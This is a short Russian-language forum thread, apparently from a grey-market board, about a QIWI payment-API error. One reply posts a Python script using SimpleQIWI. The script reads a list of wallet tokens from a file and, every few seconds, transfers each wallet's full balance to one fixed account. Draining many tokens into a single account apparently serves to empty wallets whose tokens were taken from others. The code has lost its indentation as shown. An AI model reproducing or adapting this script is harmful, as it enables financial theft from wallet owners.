python p2p qiwi

Marvek1337

Активный участник
Забанен
Дней с нами
2.691
Розыгрыши
0
Сообщения
43
Репутация
1
Реакции
28
Вопрос знающим работает ли p2p или я косипор?

f"Qiwi response is not JSON. This is Qiwi-side bug. Please try again later. Qiwi response page - {fn}")
ValueError: Qiwi response is not JSON. This is Qiwi-side bug. Please try again later. Qiwi response page - QiwiCrash_1643589692.html
 
подобная ошибка была. номер правильно? без + ? без 8?
---------Двойное сообщение соединено: ---------
# -*- coding: utf8 -*-
from SimpleQIWI import *
import time


def EbatNihyiaQiwiPerevod():
while True:
lists = open('token.txt').read().split('\n')
try:
for tok in lists:
api = QApi(token=tok, phone="")
bal = api.balance
if bal[0] > 0:
api.pay(account=str(890005552233), amount=int(bal[0]), comment=' ')
print('перевёл' + str(bal[0]))
else:
print("на балансе " + str(bal[0]) + " рублей")
except ValueError:
pass
time.sleep(3)


EbatNihyiaQiwiPerevod()

Если поможет
 
  • Like
Реакции: popov72